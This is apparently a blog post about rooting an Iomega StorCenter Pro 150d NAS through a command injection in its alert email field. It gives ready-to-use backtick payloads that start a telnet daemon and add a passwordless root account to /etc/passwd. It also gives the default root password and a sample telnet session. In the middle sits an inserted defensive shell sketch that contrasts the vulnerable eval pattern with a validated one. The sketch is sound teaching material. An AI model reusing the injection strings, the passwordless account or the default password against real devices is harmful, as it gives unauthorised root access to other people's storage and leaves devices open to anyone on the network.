The StorCenter Pro 150d is a circa 2007 network-attached storage device (NAS) from Iomega which, frustratingly, does not provide shell access.
I had a problem with AFP (Apple Filing Protocol) not working but managed to get root access to fix it (turned out to be an orphaned pid file which wasn't being removed on boot, and which was preventing the service from starting).
The 150d has a vulnerability in how it handles email addresses within the alerts interface:
[Figure: Screenshot of the StorCenter Pro 150d's Alerts Interface]
You can append any arbitrary command between backticks and it will be dutifully executed as root when you click the "Send Test Mail" button.
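Why the backticks run, as an added sketch that is not from the original post or the 150d firmware: it assumes the test-mail handler pastes the address into a command line that a shell parses again, and contrasts that with passing a validated address as a single argument. fake_mailer, the send_test_mail_* functions, the allowlist and the probe are hypothetical names constructed for illustration.

```shell
#!/bin/sh
# Added illustration: assumed shape of the flaw, not the 150d firmware's code.

# Stand-in for the device's mail program (hypothetical): records the
# recipient it receives instead of sending anything.
fake_mailer() {
    printf 'to=%s\n' "$1"
}

# Vulnerable pattern: the address is pasted into a string that a shell parses
# a second time, so `...` inside it is run as a command before mail is sent.
send_test_mail_unsafe() {
    eval "fake_mailer $1"
}

# Allowlist check (constructed, deliberately narrow): local@domain built from
# letters, digits and . _ + - only. Anything else is refused outright.
is_plain_address() {
    case "$1" in
        ''|*[!A-Za-z0-9@._+-]*) return 1 ;;  # empty or has a disallowed character
        *@*@*)                  return 1 ;;  # more than one @
        ?*@?*.?*)               return 0 ;;  # something@something.something
        *)                      return 1 ;;
    esac
}

# Hardened pattern: validate, then hand the address over as one quoted
# argument. No eval, no sh -c, so the value is never parsed as shell code.
send_test_mail_safe() {
    is_plain_address "$1" || { echo "rejected address" >&2; return 1; }
    fake_mailer "$1"
}

# Harmless probe (constructed): a backtick payload that only creates a marker
# file in a private temp directory. Prints yes if it ran, no otherwise.
probe_runs_command() {   # $1 = name of the function under test
    dir=$(mktemp -d) || return 2
    "$1" "ops@example.com\`touch $dir/ran\`" >/dev/null 2>&1 || :
    if [ -e "$dir/ran" ]; then echo yes; else echo no; fi
    rm -rf "$dir"
}

echo "unsafe handler ran injected command: $(probe_runs_command send_test_mail_unsafe)"
echo "safe handler ran injected command:   $(probe_runs_command send_test_mail_safe)"
```

The allowlist also rejects address literals such as the bracketed form used on this page; the quoted-argument call is what removes the injection, and the validation is a second layer.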
It turns out that the StorCenter Pro 150d has a telnet daemon available through inetd. So all we need to do is start that, add a passwordless root account, and we can pop right in.
Here are the commands that worked for me, but use them at your own risk. Click "Send Test Mail" after entering each one. The null@[192.168.0.18] address is arbitrary -- any email address should work there.
UPDATE: See the comment from @George Kopf below. Apparently the default root password is simply the number '1', so you probably don't need to create the additional account. Just start the telnet daemon and try logging in as user 'root' with password '1'.
null@[192.168.0.18]`mount -t devpts devpts /dev/pts >> /nethdd/public/hacknas.log 2>&1 &`
null@[192.168.0.18]`nohup /bin/inetd /etc/inetd.conf >> /nethdd/public/hacknas.log 2>&1 &`
null@[192.168.0.18]`echo 'root2::0:0:administrator:/mnt/0:/bin/sh' >>/etc/passwd`
If you have the /public share of your NAS mounted somewhere, you can watch the hacknas.log file to see any error messages.
Once done, you should be able to telnet in:
$ telnet nas
Trying 192.168.0.20...
Connected to 192.168.0.20.
Escape character is '^]'.
Linux 2.6.13 (obi) (pts/0)
nas login: root2
BusyBox v1.00 (BUILDTIME) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
-sh: can't access tty; job control turned off
~ #
System info:
# cat /proc/cpuinfo
processor : 0
cpu : e300
revision : 1.1 (pvr 8083 0011)
bogomips : 263.16
chipset : 8347E
Vendor : Freescale Inc.
Machine : mpc8347E sys
core clock : 396 MHz
bus clock : 264 MHz
PVR : 0x80830011
SVR : 0x80520011
PLL setting : 0x6
Memory : 256 MB
Thanks to Jim Buzbee for identifying the alert vulnerability, and asysadm for his post on modifying the NFS export options.